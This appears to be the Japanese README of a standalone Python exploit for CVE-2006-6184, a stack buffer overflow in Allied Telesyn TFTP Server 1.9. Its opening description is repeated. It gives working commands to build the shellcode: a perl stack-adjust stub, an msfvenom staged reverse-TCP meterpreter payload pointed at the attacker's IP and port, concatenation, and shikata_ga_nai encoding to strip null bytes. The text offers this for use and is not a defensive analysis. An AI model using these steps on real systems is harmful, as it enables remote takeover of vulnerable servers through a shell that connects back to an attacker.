
これは、CVE-2006-6184 向けの Python ベースのスタンドアロンエクスプロイトです。このエクスプロイトは、Allied Telesyn TFTP Server (AT-TFTP) 1.9(およびそれ以前の可能性あり)のスタックベースのバッファオーバーフローを引き起こし、リモート攻撃者によるサービス拒否の発生や任意のコードの実行を可能にします。
これは、CVE-2006-6184 用の Python ベースのスタンドアロンエクスプロイトです。このエクスプロイトは、Allied Telesyn TFTP Server (AT-TFTP) 1.9 およびそれ以前の可能性があるバージョンにおいてスタックベースのバッファオーバーフローを引き起こし、リモート攻撃者がサービス拒否を引き起こしたり、任意のコードを実行したりすることを可能にします。
ペイロードは、あなた自身のIPアドレスと待ち受けポートを含むようにカスタマイズする必要があるため、手動で生成する必要があります。 これを行うには、次の手順を使用します:
1.) スタックポインタから減算する量(3500)の16進ファイルを作成するには、次のコマンドを入力します:
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
2.) 次に、次のコマンドを使用して、ステージ型 meterpreter シェルペイロードを作成します:
msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload
3.) 次に、作成した2つのファイルを結合します。
cat stackadj payload > shellcode
4.) 最後に、悪い文字を排除しましょう。
msfvenom -p generic/custom PAYLOADFILE=./shellcode -b "\x00" -e x86/shikata_ga_nai -f python
出力を「payload」変数の値として入力します。このエクスプロイトが機能するには、数回実行する必要がある場合があります。